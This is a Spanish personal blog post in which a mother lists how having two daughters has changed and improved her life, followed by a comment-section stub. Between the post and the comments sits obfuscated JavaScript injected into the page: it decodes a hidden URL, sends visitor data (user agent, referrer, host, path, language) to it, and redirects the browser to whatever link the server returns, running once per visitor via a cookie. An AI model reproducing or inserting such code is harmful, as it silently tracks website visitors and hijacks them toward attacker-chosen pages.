Desde que soy madre

Sacrificar, priorizar, elegir… Oigo a muchas amigas utilizar este tipo de verbos para definir lo que es ser madre. En mi caso lo tengo claro, mejorar, sí, porque desde que soy madre soy mejor persona.

En 2011 fui madre por primera vez. Estaba feliz, pero dentro de mí brotaban, como si de un volcán en ebullición se tratase, un montón de emociones: felicidad por haber cumplido un sueño, miedo ante lo desconocido, inseguridad por saber si iba en el camino correcto… Pero como el tiempo es sabio, todas esas sensaciones fueron mitigándose. En 2015 tuve la fortuna de repetir esa experiencia y, aunque de otra manera, algo dentro de mí se movía. Entonces empecé a analizar qué me pasaba y vi que todo eran ventajas.

Desde que soy madre… no sufro de ansiedad. Simplemente tengo otras cosas más importantes en las que pensar.

Desde que soy madre… disfruto más de la naturaleza. Que sale un rayo de sol, en el parque que nos plantamos.

Desde que soy madre… aprendo cada día algo nuevo: “Mamá, ¿sabes que el hueso más pequeño del cuerpo humano se llama estribo y está en el oído”?, me dijo Elena el otro día al salir del colegio.

Desde que soy madre… trasnocho más que en mi época universitaria. “Mamá, agua”, “Mamá, pis”, “Mamá, tengo miedo”, “Mamá, no quiero dormir más”.

Desde que soy madre… sé cuál es la diferencia entre Apiretal y Dalsy.

Desde que soy madre… no me aburro. Y es que cuando no hay que preparar el disfraz para Carnaval, tenemos que pensar qué le compramos a su mejor amiga por su cumple.

Desde que soy madre… me emociono, lloro, me enfado, pataleo y me indigno cada vez que veo una noticia en la televisión sobre niños que sufren una situación de injusticia.

Desde que soy madre… he vuelto a creer en los Reyes Magos, Papá Noel y el Ratoncito Pérez.

Desde que soy madre… hablo más con mis vecin@s que no tienen hijos. Ajenos hasta ahora a mi mundo, siempre tienen una palabra o gesto de cariño hacia mis hijas.

Desde que soy madre… me sé la programación de Clan de memoria.

Desde que soy madre… leo más. Cada noche no puede faltar un cuento antes de dormirse.

Desde que soy madre… he vuelto a mi infancia. A Elena le encantan los barriguitas y mi madre rescató los que yo tenía cuando era peque para que los compartiera con ella. ¡Qué momento!

Desde que soy madre… veo todos los días amanecer. De lunes a viernes porque voy a trabajar, y fines de semana, porque me despiertan ellas.

Desde que soy madre… ya no me compro tanta ropa. Cuando entro en Sfera, ya no voy directa a la planta 1 de señora o joven, ahora me bajo directamente a la -1 (infantil).

Desde que soy madre… he aprendido a cocinar. Gracias papá por enseñarme este verano a hacer carne guisada.

Desde que soy madre… me siento más unida a mi marido. Él me ha dado lo que más quiero en este mundo, mis hijas. Como no amarle aún más.

Desde que soy madre… quiero más a mi madre.

Desde que soy madre… soy FELIZ, más FELIZ.

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

4 comentarios en “Desde que soy madre

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *